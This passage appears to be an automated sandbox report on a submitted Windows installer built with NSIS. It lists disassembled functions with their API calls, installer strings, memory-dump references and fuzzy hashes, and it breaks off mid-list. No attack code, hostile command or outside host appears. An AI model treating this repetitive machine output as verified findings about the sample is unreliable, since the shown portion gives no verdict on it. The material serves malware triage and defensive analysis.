                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(0000F200,00000064,000D0618), ref: 00403295
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00899408), ref: 00402387
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
